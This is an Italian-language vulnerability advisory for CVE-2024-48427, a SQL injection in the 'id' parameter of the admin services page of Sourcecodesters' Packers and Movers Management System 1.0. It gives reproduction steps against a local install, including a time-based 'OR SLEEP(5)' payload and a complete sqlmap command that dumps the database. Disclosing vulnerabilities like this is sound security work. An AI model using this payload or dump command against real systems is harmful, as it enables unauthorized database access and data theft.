CVE-2024-48427
Descrizione
Una vulnerabilità di SQL injection in Sourcecodesters Packers and Movers Management System v1.0 consente a utenti remoti autenticati di eseguire comandi SQL arbitrari tramite il parametro id in /mpms/admin/?page=services/manage_service&id
Tipo di vulnerabilità
SQL Injection
Vendor del prodotto
Sourcecodesters
Base di codice del prodotto interessato:
https://www.sourcecodesters.com/php/15360/packers-and-movers-management-system-phpoop-free-source-code.html - 1.0
Componente interessato:
Il parametro id di Update Service Details in /mpms/admin/?page=services/manage_service&id
Vettori di attacco:
- Installare l'applicazione localmente e accedere al pannello di amministrazione utilizzando le credenziali predefinite fornite.
- Navigare alla pagina vulnerabile: http://localhost/mpms/admin/?page=services/manage_service&id=2
- Iniettare il payload SQL nel parametro id: http://localhost/mpms/admin/?page=services/manage_service&id=1' OR SLEEP(5)-- puNr
- Osservare la risposta dell'applicazione: la pagina dovrebbe impiegare notevolmente più tempo (5 secondi) a caricarsi se l'iniezione ha successo, confermando che il parametro id è vulnerabile alla SQL injection.
- Eseguire ora lo strumento SQLMap per il dump dei dettagli del database:
- sqlmap -u "http://localhost/mpms/admin/?page=services/manage_service&id=1" --cookie="phpMyAdmin=ju34bd3d8q0jdf6td4ntqscaqd;PHPSESSID=eopn8q1p8c1f5m1v5igjoir8k1;" --dbms mysql -p id --risk 3 --level 4 --dbs --dump
Riferimenti:
- https://owasp.org/www-community/attacks/SQL_Injection
- https://portswigger.net/web-security/sql-injection